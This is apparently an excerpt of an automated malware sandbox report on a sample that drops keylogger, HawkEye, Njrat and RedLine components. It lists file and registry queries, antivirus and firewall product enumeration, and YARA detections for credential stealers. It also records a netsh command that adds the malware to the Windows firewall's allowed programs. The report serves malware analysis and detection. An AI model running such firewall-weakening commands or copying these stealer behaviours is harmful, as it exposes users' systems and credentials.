                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00407674 GetVersionExW,

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  barindex
                  Uses netsh to modify the Windows network and firewall settingsShow sources
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\RedLine.exe" "RedLine.exe" ENABLE
                  Modifies the windows firewallShow sources
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\RedLine.exe" "RedLine.exe" ENABLE
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: ViRuS.exe, 00000008.00000002.329695715.00000000007B3000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\ViRuS.exe
                  Source: ViRuS.exe, 00000008.00000003.327041471.00000000007D2000.00000004.00000001.sdmpBinary or memory string: sers\user\AppData\Local\Temp\ViRuS.exe
                  Source: Hpdyv8oO3j.exe, ViRuS.exe, 00000008.00000003.327041471.00000000007D2000.00000004.00000001.sdmpBinary or memory string: ViRuS.exe
                  Source: ViRuS.exe, 00000008.00000002.329851075.0000000002780000.00000004.00000001.sdmpBinary or memory string: \user\AppData\Local\Temp\ViRuS.exe
                  Source: Windows Update.exe, 00000011.00000002.404011011.0000000006D70000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: ViRuS.exe, 00000008.00000003.327041471.00000000007D2000.00000004.00000001.sdmpBinary or memory string: \??\C:\Users\user\AppData\Local\Temp\ViRuS.exe
                  Source: Hpdyv8oO3j.exe, 00000000.00000002.321723286.0000000000199000.00000004.00000001.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\ViRuS.exeppData\Local\Temp\ViRuS.exe

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected MailPassViewShow sources
                  Source: Yara matchFile source: 17.3.Windows Update.exe.6e1b39a.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.7bfa72.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.7bfa72.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.Keylogger.exe.eb4e92.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.3.Windows Update.exe.6e1b39a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.Keylogger.exe.eb4e92.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.43d7e00.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.7bfa72.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d49c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.7bfa72.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d9fa72.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d9fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.43d7e00.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000019.00000002.567099655.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.461183087.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.442088450.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.452870911.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.517639660.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.438271647.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439141750.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000000.418565410.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439708948.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.437787976.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.445241123.00000000013F3000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.401457902.00000000043D1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.525622624.00000000046C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Keylogger.exe PID: 4492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5624, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6444, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                  Yara detected HawkEye KeyloggerShow sources
                  Source: Yara matchFile source: 2.2.Keylogger.exe.7bfa72.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.3.Windows Update.exe.6e1b39a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.Keylogger.exe.eb4e92.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.7bfa72.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d49c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d9fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.33faa98.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.401046205.000000000384C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.461183087.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.442088450.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.452870911.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.401022146.0000000003844000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.517639660.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.438271647.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439141750.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000000.418565410.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439708948.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.437787976.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.445241123.00000000013F3000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.521512355.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Keylogger.exe PID: 4492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5624, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                  Yara detected NjratShow sources
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2886bc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ae6bc0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2a99190.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2aa6b58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.raw.unpack, type: UNPACKEDPE
